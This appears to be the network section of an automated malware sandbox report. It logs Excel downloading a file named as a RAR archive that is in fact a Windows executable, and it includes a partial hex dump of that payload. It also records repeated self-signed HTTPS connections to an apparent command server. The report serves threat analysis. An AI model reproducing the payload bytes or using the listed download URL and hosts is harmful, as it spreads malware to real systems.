Jan 12, 2021 01:46:06.155476093 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.200251102 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.200407028 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.205327988 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.205462933 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.248559952 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.248661041 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.288621902 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.291774035 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.291816950 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.404900074 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.404934883 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.405183077 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.410795927 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.453907967 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.529464006 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.583575964 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.583748102 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.585303068 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.638705969 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.657058954 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.657156944 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.657205105 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.657242060 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.670600891 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.737817049 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.738132000 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.748492002 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.748727083 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.802273989 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.802450895 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.842456102 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.856560946 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.856609106 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.948029995 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.948084116 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:06.948343039 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.948432922 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:06.954045057 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:07.007576942 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:07.076004028 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.129080057 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.129216909 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.130826950 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.183747053 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.190996885 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.191025972 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.191159964 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.191191912 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.204924107 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.258938074 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.259277105 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.267788887 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.268064976 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.320894003 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.321187973 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.358567953 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.374104023 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.374138117 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.474658012 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.474678993 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:07.474786997 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:07.474836111 CET	49401	1512	192.168.2.22	46.105.131.65

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2021 01:43:52.593648911 CET	52197	53	192.168.2.22	8.8.8.8
Jan 12, 2021 01:43:52.649863005 CET	53	52197	8.8.8.8	192.168.2.22
Jan 12, 2021 01:43:59.448873043 CET	53099	53	192.168.2.22	8.8.8.8
Jan 12, 2021 01:43:59.499317884 CET	53	53099	8.8.8.8	192.168.2.22
Jan 12, 2021 01:43:59.504878998 CET	52838	53	192.168.2.22	8.8.8.8
Jan 12, 2021 01:43:59.552831888 CET	53	52838	8.8.8.8	192.168.2.22
Jan 12, 2021 01:43:59.553232908 CET	52838	53	192.168.2.22	8.8.8.8
Jan 12, 2021 01:43:59.601133108 CET	53	52838	8.8.8.8	192.168.2.22
Jan 12, 2021 01:44:31.064388037 CET	61200	53	192.168.2.22	8.8.8.8
Jan 12, 2021 01:44:31.112456083 CET	53	61200	8.8.8.8	192.168.2.22
Jan 12, 2021 01:44:31.133083105 CET	49548	53	192.168.2.22	8.8.8.8
Jan 12, 2021 01:44:31.189367056 CET	53	49548	8.8.8.8	192.168.2.22
Jan 12, 2021 01:44:32.291182995 CET	55627	53	192.168.2.22	8.8.8.8
Jan 12, 2021 01:44:32.339005947 CET	53	55627	8.8.8.8	192.168.2.22
Jan 12, 2021 01:44:32.348968983 CET	56009	53	192.168.2.22	8.8.8.8
Jan 12, 2021 01:44:32.396790028 CET	53	56009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 12, 2021 01:43:52.593648911 CET	192.168.2.22	8.8.8.8	0x1c73	Standard query (0)	truxiellogroup.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 12, 2021 01:43:52.649863005 CET	8.8.8.8	192.168.2.22	0x1c73	No error (0)	truxiellogroup.com	68.65.122.35	A (IP address)	IN (0x0001)
Jan 12, 2021 01:44:32.339005947 CET	8.8.8.8	192.168.2.22	0xf75c	No error (0)	cdn.digicertcdn.com	104.18.10.39	A (IP address)	IN (0x0001)
Jan 12, 2021 01:44:32.339005947 CET	8.8.8.8	192.168.2.22	0xf75c	No error (0)	cdn.digicertcdn.com	104.18.11.39	A (IP address)	IN (0x0001)
Jan 12, 2021 01:44:32.396790028 CET	8.8.8.8	192.168.2.22	0x22f3	No error (0)	cdn.digicertcdn.com	104.18.10.39	A (IP address)	IN (0x0001)
Jan 12, 2021 01:44:32.396790028 CET	8.8.8.8	192.168.2.22	0x22f3	No error (0)	cdn.digicertcdn.com	104.18.11.39	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

truxiellogroup.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	68.65.122.35	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2021 01:43:52.851536036 CET	0	OUT	GET /d0l359.rar HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: truxiellogroup.com Connection: Keep-Alive
Jan 12, 2021 01:43:53.049026966 CET	2	IN	HTTP/1.1 200 OK date: Tue, 12 Jan 2021 00:43:52 GMT server: Apache last-modified: Mon, 11 Jan 2021 16:51:11 GMT accept-ranges: bytes content-length: 318976 content-type: application/x-rar-compressed Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 1c 9a fc 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 7a 04 00 00 60 00 00 00 00 00 00 d0 26 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 82 00 00 8c 00 00 00 00 00 05 00 7c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 86 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 24 00 00 00 10 00 00 00 26 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 40 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 33 00 d8 03 00 00 00 50 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 60 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 46 00 00 00 00 70 00 00 00 02 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 1b 00 00 00 80 00 00 00 1c 00 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 cc 52 04 00 00 a0 00 00 00 54 04 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 7c 2e 00 00 00 00 05 00 00 30 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 09 00 00 00 30 05 00 00 0a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 56 8b 45 0c 89 45 fc 8b 0d 28 9b 00 10 89 4d 08 68 5c 11 00 00 6a 00 ff 15 74 80 00 10 8b 55 fc 8d b4 02 66 a1 06 00 68 5c 11 00 00 6a 00 ff 15 74 80 00 10 03 f0 8b 45 08 03 30 8b 4d 08 89 31 8b 55 08 8b 02 2d 66 a1 06 00 8b 4d 08 89 01 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 51 a1 d8 9a 00 10 89 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_!2z`&@@\|.0P.text$& `.rdata@*@@.rdata3P,@@.2`0@@.rdata2Fp2@@.data`4@.text4RTP @.rsrc\|.0@@.relocP0@BUQVEE(Mh\jtUfh\jtE0M1U-fM^]UQ
Jan 12, 2021 01:43:53.049108028 CET	3	IN	Data Raw: 45 fc 8b 65 fc 58 8b e8 a1 f4 9a 00 10 50 a1 cc 9a 00 10 50 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b d2 8b 15 d0 9a 00 10 ff e2 8b e5 5d c3 cc cc cc cc Data Ascii: EeXPP]UQEE@P]U]UQHMUE]Ujjjjjjjjjj
Jan 12, 2021 01:43:53.049163103 CET	4	IN	Data Raw: 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
Jan 12, 2021 01:43:53.049215078 CET	6	IN	Data Raw: 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
Jan 12, 2021 01:43:53.049264908 CET	7	IN	Data Raw: 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 10 6a 00 ff 15 d4 88 00 Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
Jan 12, 2021 01:43:53.049315929 CET	8	IN	Data Raw: b6 51 23 83 ea 33 8b 45 f8 88 50 23 8b 4d f8 c6 41 24 63 8b 55 f8 0f b6 42 24 83 e8 33 8b 4d f8 88 41 24 8b 55 f8 c6 42 25 94 8b 45 f8 0f b6 48 25 83 e9 33 8b 55 f8 88 4a 25 8b 45 f8 c6 40 26 94 8b 4d f8 0f b6 51 26 83 ea 33 8b 45 f8 88 50 26 8b Data Ascii: Q#3EP#MA$cUB$3MA$UB%EH%3UJ%E@&MQ&3EP&MA'cUB'3MA'UB(cEH(3UJ(E@)fMQ)3EP)MAgUB3MA*UB+dEH+3UJ+E@,MQ,3EP,MA-cUB-3MA-
Jan 12, 2021 01:43:53.049355030 CET	10	IN	Data Raw: 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 Data Ascii: pppppppppppppppppppppppp
Jan 12, 2021 01:43:53.049470901 CET	11	IN	Data Raw: f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba 00 00 c7 05 70 80 00 10 f1 ba Data Ascii: pppppppppppppppppppppppp
Jan 12, 2021 01:43:53.049535990 CET	13	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 12, 2021 01:43:53.049597979 CET	14	IN	Data Raw: 00 10 54 89 00 10 58 89 00 10 5c 89 00 10 60 89 00 10 64 89 00 10 68 89 00 10 6c 89 00 10 30 89 00 10 70 89 00 10 1c 89 00 10 e8 89 00 10 ec 89 00 10 f0 89 00 10 f4 89 00 10 f8 89 00 10 fc 89 00 10 e4 89 00 10 ec 89 00 10 34 8a 00 10 00 8a 00 10 Data Ascii: TX\`dhl0p48< $(,H
Jan 12, 2021 01:43:53.241739035 CET	16	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: N@Q@(

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 12, 2021 01:43:58.265167952 CET	77.220.64.37	443	192.168.2.22	49166	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:02.725135088 CET	77.220.64.37	443	192.168.2.22	49171	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:04.816543102 CET	77.220.64.37	443	192.168.2.22	49175	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:06.899440050 CET	77.220.64.37	443	192.168.2.22	49179	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:09.036133051 CET	77.220.64.37	443	192.168.2.22	49183	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:11.132100105 CET	77.220.64.37	443	192.168.2.22	49187	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:13.200539112 CET	77.220.64.37	443	192.168.2.22	49191	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:15.545794010 CET	77.220.64.37	443	192.168.2.22	49195	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:18.668025017 CET	77.220.64.37	443	192.168.2.22	49199	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:20.782258987 CET	77.220.64.37	443	192.168.2.22	49203	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:22.895056963 CET	77.220.64.37	443	192.168.2.22	49207	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:25.002497911 CET	77.220.64.37	443	192.168.2.22	49211	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:27.108376980 CET	77.220.64.37	443	192.168.2.22	49215	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:29.176541090 CET	77.220.64.37	443	192.168.2.22	49219	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:31.256057024 CET	77.220.64.37	443	192.168.2.22	49223	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:33.550777912 CET	77.220.64.37	443	192.168.2.22	49229	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:36.422943115 CET	77.220.64.37	443	192.168.2.22	49233	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:38.558763981 CET	77.220.64.37	443	192.168.2.22	49237	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:40.655749083 CET	77.220.64.37	443	192.168.2.22	49241	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
